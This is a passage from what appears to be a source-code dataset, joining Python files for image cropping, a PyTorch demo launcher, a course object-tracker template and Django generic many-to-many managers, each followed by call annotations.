# List of tuples that contain the path to the gt and image that belong together
self.img_paths = get_img_paths_uncropped(input_path)
self.num_imgs_in_set = len(self.img_paths)
if self.num_imgs_in_set == 0:
raise RuntimeError("Found 0 images in subfolders of: {} \n Supported image extensions are: {}".format(
input_path, ",".join(IMG_EXTENSIONS)))
self.current_split = ''
self.current_img_index = -1
self.img_names_sizes, self.num_horiz_crops, self.num_vert_crops = self._get_img_size_and_crop_numbers()
self.crop_list = self._get_crop_list()
def write_crops(self):
crop_function = ImageCrop(self.crop_size)
for img_index, x, y in tqdm(self.crop_list, desc=self.progress_title):
self._load_image(img_index=img_index)
coordinates = (x, y)
split_name = self.img_names_sizes[img_index][0]
img_full_name = self.img_names_sizes[img_index][1]
img_full_name = Path(img_full_name)
img_name = img_full_name.stem
dest_folder = self.output_path / split_name / img_name
dest_folder.mkdir(parents=True, exist_ok=True)
extension = img_full_name.suffix
filename = f'{img_name}_x{x:0{self.leading_zeros_length}d}_y{y:0{self.leading_zeros_length}d}{extension}'
dest_filename = dest_folder / filename
if not self.override_existing:
if dest_filename.exists():
continue
img = self.get_crop(self.current_img, coordinates=coordinates, crop_function=crop_function)
pil_img = F.to_pil_image(img, mode='RGB')
if extension in JPG_EXTENSIONS:
pil_img.save(dest_filename, quality=95)
else:
# save_image(img, dest_filename)
pil_img.save(dest_filename)
def _load_image(self, img_index):
"""
Inits the variables responsible of tracking which crop should be taken next, the current images and the like.
This should be run every time a new page gets loaded for the test-set
"""
if self.current_img_index == img_index:
return
# Load image
self.current_img = pil_loader(self.img_paths[img_index][0])
# Update pointer to current image
self.current_img_index = img_index
self.current_split = self.img_paths[img_index][1]
def get_crop(self, img, coordinates, crop_function):
img = crop_function(img, coordinates)
return img
def _get_img_size_and_crop_numbers(self):
img_names_sizes = [] # list of tuples -> (split_name, img_name, img_size (H, W))
num_horiz_crops = []
num_vert_crops = []
for img_path, split_name in self.img_paths:
data_img = pil_loader(img_path)
img_names_sizes.append((split_name, img_path.name, data_img.size))
num_horiz_crops.append(math.ceil((data_img.size[0] - self.crop_size) / self.step_size + 1))
num_vert_crops.append(math.ceil((data_img.size[1] - self.crop_size) / self.step_size + 1))
return img_names_sizes, num_horiz_crops, num_vert_crops
def _get_crop_list(self):
return [self._convert_crop_id_to_coordinates(img_index, hcrop_index, vcrop_index) for img_index in
range(self.num_imgs_in_set) for hcrop_index, vcrop_index in
itertools.product(range(self.num_horiz_crops[img_index]),
range(self.num_vert_crops[img_index]))]
def _convert_crop_id_to_coordinates(self, img_index, hcrop_index, vcrop_index):
# X coordinate
if hcrop_index == self.num_horiz_crops[img_index] - 1:
# We are at the end of a line
x_position = self.img_names_sizes[img_index][2][0] - self.crop_size
else:
x_position = self.step_size * hcrop_index
assert x_position < self.img_names_sizes[img_index][2][0] - self.crop_size
# Y coordinate
if vcrop_index == self.num_vert_crops[img_index] - 1:
# We are at the bottom end
y_position = self.img_names_sizes[img_index][2][1] - self.crop_size
else:
y_position = self.step_size * vcrop_index
assert y_position < self.img_names_sizes[img_index][2][1] - self.crop_size
return img_index, x_position, y_position
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input_path',
help='Path to the root folder of the dataset (contains train/val/test)',
type=Path,
required=True)
parser.add_argument('-o', '--output_path',
help='Path to the output folder',
type=Path,
required=True)
parser.add_argument('-tr', '--crop_size_train',
help='Size of the crops in the training set',
type=int,
required=True)
parser.add_argument('-v', '--crop_size_val',
help='Size of the crops in the validation set',
type=int,
required=True)
parser.add_argument('-te', '--crop_size_test',
help='Size of the crops in the test set',
type=int,
required=True)
parser.add_argument('-ov', '--overlap',
help='Overlap of the different crops (between 0-1)',
type=float,
default=0.5)
parser.add_argument('-l', '--leading_zeros_length',
help='amount of leading zeros to encode the coordinates',
type=int,
default=4)
parser.add_argument('-oe', '--override_existing',
help='If true overrides the images ',
type=bool,
default=False)
args = parser.parse_args()
dataset_generator = CroppedDatasetGenerator(**args.__dict__)
dataset_generator.write_crops()
# example call arguments
# -i
# /Users/voegtlil/Documents/04_Datasets/003-DataSet/CB55-10-segmentation
# -o
# /Users/voegtlil/Desktop/fun
# -tr
# 300
# -v
# 300
# -te
# 256
# example call arguments
# -i
# /dataset/DIVA-HisDB/segmentation/CB55
# -o
# /net/research-hisdoc/datasets/semantic_segmentation/datasets_cropped/temp-CB55
# -tr
# 300
# -v
# 300
# -te
# 256
# dataset_generator = CroppedDatasetGenerator(
# input_path=Path('/dataset/DIVA-HisDB/segmentation/CB55'),
# output_path=Path('/net/research-hisdoc/datasets/semantic_segmentation/datasets_cropped/CB55'),
# crop_size_train=300,
# crop_size_val=300,
# crop_size_test=256,
# overlap=0.5,
# leading_zeros_length=4,
# override_existing=False)
# dataset_generator.write_crops()
| [((271, 13, 271, 38), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ({}, {}), '()', False, 'import argparse\n'), ((38, 8, 38, 59), 'logging.error', 'logging.error', ({(38, 22, 38, 58): 'f"""Directory not found ({directory})"""'}, {}), "(f'Directory not found ({directory})')", False, 'import logging\n'), ((181, 31, 181, 77), 'tqdm.tqdm', 'tqdm', (), '', False, 'from tqdm import tqdm\n'), ((221, 27, 221, 67), 'torchvision.datasets.folder.pil_loader', 'pil_loader', ({(221, 38, 221, 66): 'self.img_paths[img_index][0]'}, {}), '(self.img_paths[img_index][0])', False, 'from torchvision.datasets.folder import has_file_allowed_extension, pil_loader\n'), ((35, 16, 35, 31), 'pathlib.Path', 'Path', ({(35, 21, 35, 30): 'directory'}, {}), '(directory)', False, 'from pathlib import Path\n'), ((74, 12, 74, 105), 'torchvision.transforms.functional.crop', 'F.crop', (), '', True, 'from torchvision.transforms import functional as F\n'), ((187, 28, 187, 47), 'pathlib.Path', 'Path', ({(187, 33, 187, 46): 'img_full_name'}, {}), '(img_full_name)', False, 'from pathlib import Path\n'), ((203, 22, 203, 53), 'torchvision.transforms.functional.to_pil_image', 'F.to_pil_image', (), '', True, 'from torchvision.transforms import functional as F\n'), ((237, 23, 237, 43), 'torchvision.datasets.folder.pil_loader', 'pil_loader', ({(237, 34, 237, 42): 'img_path'}, {}), '(img_path)', False, 'from torchvision.datasets.folder import has_file_allowed_extension, pil_loader\n'), ((239, 35, 239, 102), 'math.ceil', 'math.ceil', ({(239, 45, 239, 101): '((data_img.size[0] - self.crop_size) / self.step_size + 1)'}, {}), '((data_img.size[0] - self.crop_size) / self.step_size + 1)', False, 'import math\n'), ((240, 34, 240, 101), 'math.ceil', 'math.ceil', ({(240, 44, 240, 100): '((data_img.size[1] - self.crop_size) / self.step_size + 1)'}, {}), '((data_img.size[1] - self.crop_size) / self.step_size + 1)', False, 'import math\n'), ((122, 22, 122, 36), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime\n'), ((148, 21, 148, 35), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime\n')] |
seanzhangJM/torch_model_demo | run.py | 3ab3e841e77cf780198516c1910c906acdd3082d | #!/usr/bin/env python
# _*_ coding: utf-8 _*_
# @Time : 2021/12/27 14:04
# @Author : zhangjianming
# @Email : [email protected]
# @File : run_task.py
# @Software: PyCharm
import sys
sys.path.extend(["."])
from torch_model_demo.task.run_task import train_fashion_demo
if __name__ == '__main__':
train_fashion_demo()
| [((11, 0, 11, 22), 'sys.path.extend', 'sys.path.extend', ({(11, 16, 11, 21): "['.']"}, {}), "(['.'])", False, 'import sys\n'), ((16, 4, 16, 24), 'torch_model_demo.task.run_task.train_fashion_demo', 'train_fashion_demo', ({}, {}), '()', False, 'from torch_model_demo.task.run_task import train_fashion_demo\n')] |
OrangeRedeng/CV-SUMMER-CAMP-2021 | practice/4_tracking/tracker.py | 74a65d0b21e4876e1fc1c3d931af76193f36e617 | import numpy as np
import math
import logging as log
import sys
from tqdm import tqdm
from common.feature_distance import calc_features_similarity
from common.common_objects import DetectedObject, validate_detected_object, Bbox
from common.common_objects import get_bbox_center, get_dist, calc_bbox_area
from common.find_best_assignment import solve_assignment_problem
from common.annotation import AnnotationObject, AnnotationStorage
class Track:
__next_track_id = 0
def __init__(self, first_obj):
self.objects = []
self._track_id = Track.__next_track_id
Track.__next_track_id += 1
self.objects.append(first_obj)
def _validate(self):
assert len(self.objects) > 0
for o in self.objects:
validate_detected_object(o)
for i in range(len(self.objects) - 1):
self.objects[i].frame_index < self.objects[i+1].frame_index
def add_object(self, o):
self._validate()
validate_detected_object(o)
last_frame_index = self.objects[-1].frame_index
if not last_frame_index < o.frame_index:
raise RuntimeError("Add object={} to track with the last_frame_index={}".format(o, last_frame_index))
self.objects.append(o)
def last(self):
return self.objects[-1]
def get_id(self):
return self._track_id
def get_bbox_for_frame(self, cur_frame_ind):
"""Finds bbox for frame index using linear approximation"""
self._validate()
i_found = None
for i, o in enumerate(self.objects):
if o.frame_index == cur_frame_ind:
return o.bbox
if o.frame_index > cur_frame_ind:
i_found = i
break
if i_found is None: # cur_frame_ind after the last frame_index in track
return None
if i_found == 0: # cur_frame_ind before the first frame_index in track
return None
log.debug("using linear approximation for track id={}, frame_index={}".format(self._track_id, cur_frame_ind))
o1 = self.objects[i_found-1]
o2 = self.objects[i_found]
assert o1.frame_index < cur_frame_ind < o2.frame_index
dindex = o2.frame_index - o1.frame_index
d_cur_index1 = cur_frame_ind - o1.frame_index
d_cur_index2 = o2.frame_index - cur_frame_ind
bbox1 = o1.bbox
bbox2 = o2.bbox
res_bbox = [None, None, None, None]
for k in range(4):
# linear approximation for all bbox fields
res_bbox[k] = (bbox1[k] * d_cur_index2 + bbox2[k] * d_cur_index1) / dindex
res_bbox = Bbox(res_bbox[0], res_bbox[1], res_bbox[2], res_bbox[3])
return res_bbox
class Tracker:
def __init__(self, num_frames_to_remove_track, num_objects_to_make_track_valid, affinity_threshold):
self.tracks = []
self.track_archive = []
self.num_frames_to_remove_track = num_frames_to_remove_track
self.num_objects_to_make_track_valid = num_objects_to_make_track_valid
self.affinity_threshold = affinity_threshold
def add_objects(self, det_objs):
log.debug("begin: handling {} objects".format(len(det_objs)))
if len(det_objs) == 0:
return
frame_index = det_objs[0].frame_index
assert all(o.frame_index == frame_index for o in det_objs), "All det_objs should have the same frame_index"
affinity_matrix = self._build_affinity_matrix(det_objs)
self._validate_affinity_matrix(affinity_matrix, len(self.tracks), len(det_objs))
self._log_affinity_matrix(affinity_matrix)
decision, best_affinity = self._solve_assignment_problem(affinity_matrix)
self._log_decision(decision, best_affinity, det_objs, frame_index)
self._apply_decision(decision, det_objs, frame_index)
self._move_obsolete_tracks_to_archive(frame_index)
log.debug("end: handling {} objects".format(len(det_objs)))
@staticmethod
def _validate_affinity_matrix(affinity_matrix, num_tracks, num_det_objs):
assert isinstance(affinity_matrix, list)
assert len(affinity_matrix) == num_tracks
for affinity_row in affinity_matrix:
assert isinstance(affinity_row, list)
assert len(affinity_row) == num_det_objs
assert all(isinstance(v, float) for v in affinity_row)
assert all(v >= 0 for v in affinity_row)
def _build_affinity_matrix(self, det_objs):
affinity_matrix = []
for t in self.tracks:
affinity_row = []
for o in det_objs:
cur_affinity = self._calc_affinity(t, o)
affinity_row.append(cur_affinity)
affinity_matrix.append(affinity_row)
return affinity_matrix
def _calc_affinity(self, track, obj):
affinity_appearance = self._calc_affinity_appearance(track, obj)
affinity_position = self._calc_affinity_position(track, obj)
affinity_shape = self._calc_affinity_shape(track, obj)
return affinity_appearance * affinity_position * affinity_shape
def _calc_affinity_appearance(self, track, obj):
raise NotImplementedError("The function _calc_affinity_appearance is not implemented -- implement it by yourself")
def _calc_affinity_position(self, track, obj):
raise NotImplementedError("The function _calc_affinity_position is not implemented -- implement it by yourself")
def _calc_affinity_shape(self, track, obj):
raise NotImplementedError("The function _calc_affinity_shape is not implemented -- implement it by yourself")
@staticmethod
def _log_affinity_matrix(affinity_matrix):
with np.printoptions(precision=2, suppress=True, threshold=sys.maxsize, linewidth=sys.maxsize):
log.debug("Affinity matrix =\n{}".format(np.array(affinity_matrix)))
def _solve_assignment_problem(self, affinity_matrix):
decision, best_affinity = solve_assignment_problem(affinity_matrix, self.affinity_threshold)
return decision, best_affinity
def _log_decision(self, decision, best_affinity, det_objs, frame_index):
log.debug("Logging decision for frame index={}".format(frame_index))
num_tracks = len(self.tracks)
for track_index in range(num_tracks):
assert track_index in decision
obj_index = decision[track_index] # index of the object assigned to the track
if obj_index is not None:
assert 0 <= obj_index < len(det_objs)
obj_bbox = det_objs[obj_index].bbox
else:
obj_bbox = None
cur_best_affinity = best_affinity[track_index]
if cur_best_affinity is not None:
best_affinity_str = "{:.3f}".format(cur_best_affinity)
else:
best_affinity_str = str(cur_best_affinity)
log.debug("track_index={}, track id={}, last_bbox={}, decision={}, best_affinity={} => {}".format(
track_index, self.tracks[track_index].get_id(),
self.tracks[track_index].last().bbox,
decision[track_index],
best_affinity_str,
obj_bbox))
def _apply_decision(self, decision, det_objs, frame_index):
set_updated_tracks_indexes = set()
num_det_objs = len(det_objs)
num_tracks = len(self.tracks)
object_indexes_not_mapped_to_tracks = set(range(num_det_objs)) # all indexes from 0 to num_det_objs-1
for track_index in range(num_tracks):
assert track_index in decision
obj_index = decision[track_index] # index of the object assigned to the track
if obj_index is None:
# no objects are mapped for this track
continue
assert 0 <= obj_index < num_det_objs
if obj_index not in object_indexes_not_mapped_to_tracks:
raise RuntimeError("ERROR: Algorithm assigned the object {} to several tracks".format(obj_index))
object_indexes_not_mapped_to_tracks.remove(obj_index)
o = det_objs[obj_index]
self.tracks[track_index].add_object(o)
# create new tracks for all the objects not mapped to tracks
for obj_index in object_indexes_not_mapped_to_tracks:
o = det_objs[obj_index]
self._create_new_track(o)
def _create_new_track(self, o):
new_track = Track(o)
self.tracks.append(new_track)
log.debug("created new track: id={} object: frame_index={}, {}".format(
new_track.get_id(), o.frame_index, o.bbox))
def _move_obsolete_tracks_to_archive(self, frame_index):
new_tracks = []
for t in self.tracks:
last_frame_index = t.last().frame_index
if frame_index - last_frame_index >= self.num_frames_to_remove_track:
log.debug("Move the track id={} to archive: the current frame_index={}, "
"the last frame_index in track={}".format(
t.get_id(), frame_index, last_frame_index))
self.track_archive.append(t)
else:
new_tracks.append(t)
self.tracks = new_tracks
def is_track_valid(self, track):
assert isinstance(track, Track)
return len(track.objects) > self.num_objects_to_make_track_valid
def get_all_valid_tracks(self):
res = []
for t in self.track_archive:
if self.is_track_valid(t):
res.append(t)
for t in self.tracks:
if self.is_track_valid(t):
res.append(t)
return res
def convert_tracks_to_annotation_storage(tracks):
ann_objects_by_frame_index = {}
for cur_track in tqdm(tracks, desc="Converting"):
track_id = cur_track.get_id()
first_frame_index = cur_track.objects[0].frame_index
last_frame_index = cur_track.objects[-1].frame_index
for frame_index in range(first_frame_index, last_frame_index+1):
bbox = cur_track.get_bbox_for_frame(frame_index)
tl_x = math.floor(bbox.tl_x)
tl_y = math.floor(bbox.tl_y)
br_x = math.ceil(bbox.br_x)
br_y = math.ceil(bbox.br_y)
detect_obj = DetectedObject(frame_index=frame_index,
bbox=Bbox(tl_x, tl_y, br_x, br_y),
appearance_feature=[])
ann_obj = AnnotationObject(detect_obj=detect_obj,
track_id=track_id)
if frame_index not in ann_objects_by_frame_index:
ann_objects_by_frame_index[frame_index] = {}
ann_objects_by_frame_index[frame_index][track_id] = ann_obj
annotation_objects = []
for frame_index in sorted(ann_objects_by_frame_index.keys()):
cur_ann_objects = ann_objects_by_frame_index[frame_index]
for track_id in sorted(cur_ann_objects.keys()):
annotation_objects.append(cur_ann_objects[track_id])
annotation_storage = AnnotationStorage.create_annotation_storage_from_list(annotation_objects)
return annotation_storage
| [((243, 21, 243, 52), 'tqdm.tqdm', 'tqdm', (), '', False, 'from tqdm import tqdm\n'), ((271, 25, 271, 98), 'common.annotation.AnnotationStorage.create_annotation_storage_from_list', 'AnnotationStorage.create_annotation_storage_from_list', ({(271, 79, 271, 97): 'annotation_objects'}, {}), '(annotation_objects)', False, 'from common.annotation import AnnotationObject, AnnotationStorage\n'), ((30, 8, 30, 35), 'common.common_objects.validate_detected_object', 'validate_detected_object', ({(30, 33, 30, 34): 'o'}, {}), '(o)', False, 'from common.common_objects import DetectedObject, validate_detected_object, Bbox\n'), ((75, 19, 75, 75), 'common.common_objects.Bbox', 'Bbox', ({(75, 24, 75, 35): 'res_bbox[0]', (75, 37, 75, 48): 'res_bbox[1]', (75, 50, 75, 61): 'res_bbox[2]', (75, 63, 75, 74): 'res_bbox[3]'}, {}), '(res_bbox[0], res_bbox[1], res_bbox[2], res_bbox[3])', False, 'from common.common_objects import DetectedObject, validate_detected_object, Bbox\n'), ((150, 34, 150, 100), 'common.find_best_assignment.solve_assignment_problem', 'solve_assignment_problem', ({(150, 59, 150, 74): 'affinity_matrix', (150, 76, 150, 99): 'self.affinity_threshold'}, {}), '(affinity_matrix, self.affinity_threshold)', False, 'from common.find_best_assignment import solve_assignment_problem\n'), ((24, 12, 24, 39), 'common.common_objects.validate_detected_object', 'validate_detected_object', ({(24, 37, 24, 38): 'o'}, {}), '(o)', False, 'from common.common_objects import DetectedObject, validate_detected_object, Bbox\n'), ((146, 13, 146, 102), 'numpy.printoptions', 'np.printoptions', (), '', True, 'import numpy as np\n'), ((251, 19, 251, 40), 'math.floor', 'math.floor', ({(251, 30, 251, 39): 'bbox.tl_x'}, {}), '(bbox.tl_x)', False, 'import math\n'), ((252, 19, 252, 40), 'math.floor', 'math.floor', ({(252, 30, 252, 39): 'bbox.tl_y'}, {}), '(bbox.tl_y)', False, 'import math\n'), ((253, 19, 253, 39), 'math.ceil', 'math.ceil', ({(253, 29, 253, 38): 'bbox.br_x'}, {}), '(bbox.br_x)', False, 'import math\n'), ((254, 19, 254, 39), 'math.ceil', 'math.ceil', ({(254, 29, 254, 38): 'bbox.br_y'}, {}), '(bbox.br_y)', False, 'import math\n'), ((258, 22, 259, 57), 'common.annotation.AnnotationObject', 'AnnotationObject', (), '', False, 'from common.annotation import AnnotationObject, AnnotationStorage\n'), ((147, 53, 147, 78), 'numpy.array', 'np.array', ({(147, 62, 147, 77): 'affinity_matrix'}, {}), '(affinity_matrix)', True, 'import numpy as np\n'), ((256, 45, 256, 73), 'common.common_objects.Bbox', 'Bbox', ({(256, 50, 256, 54): 'tl_x', (256, 56, 256, 60): 'tl_y', (256, 62, 256, 66): 'br_x', (256, 68, 256, 72): 'br_y'}, {}), '(tl_x, tl_y, br_x, br_y)', False, 'from common.common_objects import DetectedObject, validate_detected_object, Bbox\n')] |
mikewolfd/django-gm2m | gm2m/managers.py | a8cecc4d6d56c83e8d9c623888f5d07cb6ad8771 | from django.db import router
from django.db.models import Q, Manager
from django.db import connections
from .contenttypes import ct, get_content_type
from .query import GM2MTgtQuerySet
class GM2MBaseManager(Manager):
use_in_migration = True
def __init__(self, instance):
super(GM2MBaseManager, self).__init__()
self.model = self._model # see create_gm2m_related_manager
self.instance = instance
self.pk = instance.pk
self.core_filters = {}
def get_queryset(self):
try:
return self.instance \
._prefetched_objects_cache[self.prefetch_cache_name]
except (AttributeError, KeyError):
db = self._db or router.db_for_read(self.instance.__class__,
instance=self.instance)
return self._get_queryset(using=db)._next_is_sticky() \
.filter(**self.core_filters)
def _get_queryset(self, using):
return super(GM2MBaseManager, self).get_queryset().using(using)
def get_prefetch_queryset(self, instances, queryset=None):
db = self._db or router.db_for_read(self.model,
instance=instances[0])
if queryset is None:
queryset = self._get_queryset(db)
qs, rel_obj_attr, instance_attr = \
self._get_prefetch_queryset_params(instances, queryset, db)
return (qs,
rel_obj_attr,
instance_attr,
False,
self.prefetch_cache_name)
def _get_extra_queryset(self, queryset, q, extra_fields, db):
join_table = self.through._meta.db_table
connection = connections[db]
qn = connection.ops.quote_name
extra = dict(select=dict(
('_prefetch_related_val_%s' % f.attname,
'%s.%s' % (qn(join_table), qn(f.column)))
for f in extra_fields))
return queryset.using(db)._next_is_sticky().filter(q).extra(**extra)
def _check_through_model(self, method_name):
# If the GM2M relation has an intermediary model,
# the add and remove methods are not available.
if not self.through._meta.auto_created:
opts = self.through._meta
raise AttributeError(
'Cannot use %s() on a ManyToManyField which specifies an '
'intermediary model. Use %s.%s\'s Manager instead.'
% (method_name, opts.app_label, opts.object_name))
def _do_add(self, db, through_objs):
"""
Performs items addition
"""
# Add the new entries in the db table
self.through._default_manager.using(db).bulk_create(through_objs)
def add(self, *objs):
"""
Adds objects to the GM2M field
:param *objs: object instances to add
"""
#
self._check_through_model('add')
if not objs:
return
db = router.db_for_write(self.through, instance=self.instance)
self._do_add(db, self._to_add(objs, db))
add.alters_data = True
def _do_remove(self, db, q):
"""
Perfoms items removal from a Q object
"""
self.through._default_manager.using(db).filter(q).delete()
def remove(self, *objs):
"""
Removes objects from the GM2M field
"""
# *objs - objects to remove
self._check_through_model('remove')
if not objs:
return
db = router.db_for_write(self.through, instance=self.instance)
self._do_remove(db, self._to_remove(objs))
remove.alters_data = True
def _do_clear(self, db, filter=None):
self.through._default_manager.using(db).filter(**(filter or {})) \
.delete()
def set(self, objs, **kwargs):
"""
Sets the objs iterable as the set of related objects
(Added for compatibility with Django 1.9)
"""
self._check_through_model('set')
objs = tuple(objs)
clear = kwargs.pop('clear', False)
db = router.db_for_write(self.through, instance=self.instance)
if clear:
# clears all and re-adds
self._do_clear(db)
self._do_add(db, *objs)
else:
# just removes the necessary items and adds the missing ones
to_add, to_remove = self._to_change(objs, db)
self._do_remove(db, to_remove)
self._do_add(db, to_add)
set.alters_data = True
def clear(self):
db = router.db_for_write(self.through, instance=self.instance)
self._do_clear(db, self._to_clear())
clear.alters_data = True
class GM2MBaseSrcManager(Manager):
def __init__(self, instance):
# the manager's model is the source model
super(GM2MBaseSrcManager, self).__init__(instance)
self.core_filters['%s__%s' % (self.query_field_name,
self.field_names['tgt_ct'])] = \
get_content_type(self.instance)
self.core_filters['%s__%s' % (self.query_field_name,
self.field_names['tgt_fk'])] = \
self.instance.pk
def _get_prefetch_queryset_params(self, instances, queryset, db):
# we're looking for generic target instances, which should be
# converted to (content_type, primary_key) tuples
q = Q()
for obj in instances:
q = q | Q(**{
'%s__%s' % (self.query_field_name,
self.field_names['tgt_ct']):get_content_type(obj),
'%s__%s' % (self.query_field_name,
self.field_names['tgt_fk']): obj.pk
})
# Annotating the query in order to retrieve the primary model
# content type and id in the same query
# content type must be the 1st element, see rel_obj_attr below
extra_fields = (
self.through._meta.get_field(self.field_names['tgt_ct']),
self.through._meta.get_field(self.field_names['tgt_fk'])
)
qs = self._get_extra_queryset(queryset, q, extra_fields, db)
# primary model retrieval function
def rel_obj_attr(relobj):
t = []
for f in extra_fields:
try:
# t already contains the content type id
# we use get_for_id to retrieve the cached content type
model = ct.ContentType.objects.get_for_id(t[0]) \
.model_class()
except IndexError:
# t is empty
model = ct.ContentType
t.append(model._meta.pk.to_python(
getattr(relobj, '_prefetch_related_val_%s' % f.attname)
))
return tuple(t)
# model attribute retrieval function
instance_attr = lambda inst: \
(get_content_type(inst).pk, inst.pk)
return qs, rel_obj_attr, instance_attr
def _to_add(self, objs, db):
# we're using the reverse relation to add source model
# instances
inst_ct = get_content_type(self.instance)
vals = self.through._default_manager.using(db) \
.values_list(self.field_names['src'],
flat=True) \
.filter(**{
self.field_names['tgt_ct']: inst_ct,
self.field_names['tgt_fk']: self.pk
})
to_add = []
for obj in objs:
if obj.pk not in vals:
to_add.append(self.through(**{
'%s_id' % self.field_names['src']:
obj.pk,
self.field_names['tgt_ct']: inst_ct,
self.field_names['tgt_fk']: self.pk
}))
return to_add
def _to_remove(self, objs):
# we're using the reverse relation to delete source model
# instances
inst_ct = get_content_type(self.instance)
return Q(**{
'%s_id__in' % self.field_names['src']:
[obj.pk for obj in objs],
self.field_names['tgt_ct']: inst_ct,
self.field_names['tgt_fk']: self.pk
})
def _to_change(self, objs, db):
"""
Returns the sets of items to be added and a Q object for removal
"""
inst_ct = get_content_type(self.instance)
vals = list(self.through._default_manager.using(db)
.values_list(self.field_names['src'], flat=True)
.filter(**{
self.field_names['tgt_ct']: inst_ct,
self.field_names['tgt_fk']: self.pk
}))
to_add = set()
to_remove = set()
for obj in objs:
try:
vals.remove(obj.pk)
except ValueError:
# obj.pk is not in vals and must be added
to_add.add(self.through(**{
'%s_id' % self.field_names['src']:
obj.pk,
self.field_names['tgt_ct']: inst_ct,
self.field_names['tgt_fk']: self.pk
}))
for v in vals:
to_remove.add(v)
return to_add, Q(pk__in=to_remove)
def _to_clear(self):
return {
self.field_names['tgt_ct']: get_content_type(self.instance),
self.field_names['tgt_fk']: self.instance.pk
}
class GM2MBaseTgtManager(Manager):
def __init__(self, instance):
# the manager's model is the through model
super(GM2MBaseTgtManager, self).__init__(instance)
source_field = self.through._meta.get_field(
self.field_names['src'])
self.source_related_fields = source_field.related_fields
for __, rh_field in self.source_related_fields:
key = '%s__%s' % (self.query_field_name, rh_field.name)
self.core_filters[key] = getattr(self.instance,
rh_field.attname)
def _get_queryset(self, using):
return GM2MTgtQuerySet(self.model, using=using)
def _get_prefetch_queryset_params(self, instances, queryset, db):
# we're looking for through model instances
query = {}
for lh_field, rh_field in self.source_related_fields:
query['%s__in' % lh_field.name] = \
set(getattr(obj, rh_field.attname)
for obj in instances)
q = Q(**query)
# Annotating the query in order to retrieve the primary model
# id in the same query
fk = self.through._meta.get_field(self.field_names['src'])
extra_fields = fk.local_related_fields
qs = self._get_extra_queryset(queryset, q, extra_fields, db)
# marking the queryset so that the original queryset should
# be returned when evaluated the first time
qs._related_prefetching = True
# primary model retrieval function
def rel_obj_attr(relobj):
t = []
for f in extra_fields:
v = getattr(relobj,
'_prefetch_related_val_%s' % f.attname)
try:
v = v.pop()
except AttributeError: # v is not a list
pass
t.append(f.related_model._meta.pk.to_python(v))
return tuple(t)
# model attribute retrieval function
select_fields = fk.foreign_related_fields
instance_attr = lambda inst: tuple([getattr(inst, f.attname)
for f in select_fields])
return qs, rel_obj_attr, instance_attr
def _to_add(self, objs, db):
models = []
objs_set = set()
for obj in objs:
# extract content type and primary key for each object
objs_set.add((get_content_type(obj),
obj.pk))
m = obj.__class__
if m not in models:
# call field.add_relation for each model
models.append(m)
self.field.add_relation(m, auto=True)
vals = self.through._default_manager.using(db) \
.filter(**{self.field_names['src']: self.pk}) \
.values_list(self.field_names['tgt_ct'],
self.field_names['tgt_fk'])
to_add = []
for ct, pk in objs_set.difference(vals):
to_add.append(self.through(**{
'%s_id' % self.field_names['src']: self.pk,
self.field_names['tgt_ct']: ct,
self.field_names['tgt_fk']: pk
}))
return to_add
def _to_remove(self, objs):
q = Q()
for obj in objs:
# Convert the obj to (content_type, primary_key)
q = q | Q(**{
self.field_names['tgt_ct']: get_content_type(obj),
self.field_names['tgt_fk']: obj.pk
})
return q & Q(**{
'%s_id' % self.field_names['src']: self.pk
})
def _to_clear(self):
return {
'%s_id' % self.field_names['src']: self.pk
}
def _to_change(self, objs, db):
"""
Returns the sets of items to be added and a Q object for removal
"""
to_add = set()
src_fname = self.field_names['src']
ct_fname = self.field_names['tgt_ct']
fk_fname = self.field_names['tgt_fk']
vals = list(self.through._default_manager.using(db)
.filter(**{self.field_names['src']: self.pk})
.values_list(ct_fname, fk_fname))
known_cts = set(v[0] for v in vals)
for obj in objs:
ct = get_content_type(obj)
val = (ct, obj.pk)
try:
vals.remove(val)
except ValueError:
# val is not in vals
# extract content type and primary key for each object
to_add.add((ct, obj.pk))
if ct.pk not in known_cts:
# call field.add_relation for each unknown model
self.field.add_relation(obj.__class__, auto=True)
known_cts.add(ct.pk)
rem_q = Q()
for val in vals:
# Convert the obj to (content_type, primary_key)
rem_q = rem_q | Q(**{
ct_fname: val[0],
fk_fname: val[1]
})
return [
self.through(**{
'%s_id' % src_fname: self.pk,
ct_fname: t[0],
fk_fname: t[1]
}) for t in to_add
], \
rem_q & Q(**{
'%s_id' % src_fname: self.pk
})
def create_gm2m_related_manager(superclass=None, **kwargs):
"""
Dynamically create a manager class that only concerns an instance (source
or target)
"""
bases = [GM2MBaseManager]
if superclass is None:
# no superclass provided, the manager is a generic target model manager
bases.insert(0, GM2MBaseTgtManager)
else:
# superclass provided, the manager is a source model manager and also
# derives from superclass
bases.insert(0, GM2MBaseSrcManager)
bases.append(superclass)
# Django's Manager constructor sets model to None, we store it under the
# class's attribute '_model' and it is retrieved in __init__
kwargs['_model'] = kwargs.pop('model')
return type(Manager)('GM2MManager', tuple(bases), kwargs)
| [((88, 13, 88, 70), 'django.db.router.db_for_write', 'router.db_for_write', (), '', False, 'from django.db import router\n'), ((110, 13, 110, 70), 'django.db.router.db_for_write', 'router.db_for_write', (), '', False, 'from django.db import router\n'), ((129, 13, 129, 70), 'django.db.router.db_for_write', 'router.db_for_write', (), '', False, 'from django.db import router\n'), ((143, 13, 143, 70), 'django.db.router.db_for_write', 'router.db_for_write', (), '', False, 'from django.db import router\n'), ((166, 12, 166, 15), 'django.db.models.Q', 'Q', ({}, {}), '()', False, 'from django.db.models import Q, Manager\n'), ((234, 15, 239, 10), 'django.db.models.Q', 'Q', ({}, {}), "(**{('%s_id__in' % self.field_names['src']): [obj.pk for obj in objs],\n self.field_names['tgt_ct']: inst_ct, self.field_names['tgt_fk']: self.pk})", False, 'from django.db.models import Q, Manager\n'), ((305, 12, 305, 22), 'django.db.models.Q', 'Q', ({}, {}), '(**query)', False, 'from django.db.models import Q, Manager\n'), ((366, 12, 366, 15), 'django.db.models.Q', 'Q', ({}, {}), '()', False, 'from django.db.models import Q, Manager\n'), ((414, 16, 414, 19), 'django.db.models.Q', 'Q', ({}, {}), '()', False, 'from django.db.models import Q, Manager\n'), ((34, 25, 35, 66), 'django.db.router.db_for_read', 'router.db_for_read', (), '', False, 'from django.db import router\n'), ((271, 23, 271, 42), 'django.db.models.Q', 'Q', (), '', False, 